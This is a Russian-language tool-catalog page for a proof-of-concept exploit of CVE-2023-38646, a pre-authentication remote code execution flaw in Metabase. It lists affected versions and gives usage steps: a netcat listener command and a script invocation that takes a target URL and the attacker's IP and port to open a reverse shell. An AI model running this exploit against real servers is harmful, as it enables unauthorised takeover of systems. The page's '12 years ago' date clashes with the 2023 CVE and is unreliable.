Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-38646 — Metabase Pre-Auth RCE POC | Kitploit
Инструменты/GitHubGitHub/mrunalkaran/cve-2023-38646
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubmrunalkaran/cve-2023-38646

CVE-2023-38646

Metabase Pre-Auth RCE POC

Репозиторий
12 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Metabase Pre-Auth RCE POC - CVE-2023-38646

Metabase с открытым исходным кодом до версии 0.46.6.1 и Metabase Enterprise до версии 1.46.6.1 позволяют злоумышленникам выполнять произвольные команды на сервере. Я написал скрипт для непосредственного получения reverse shell на машине атакующего.

Использование

Скрипту требуются URL цели, IP и порт атакующего. Указывать setup token не требуется для этого эксплойта, так как скрипт пытается получить его из /api/session/properties.

Убедитесь, что на машине атакующего запущен netcat listener, используя следующую команду: nc -nlvp {Port}

Запустите POC-скрипт со следующими параметрами:

  • -u - URL цели (Metabase)
  • -ip - IP атакующего
  • -p - номер порта
root@kitploit:~
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>

POC

Ссылки

  • https://github.com/m3m0o/metabase-pre-auth-rce-poc/
  • https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
Скачать инструмент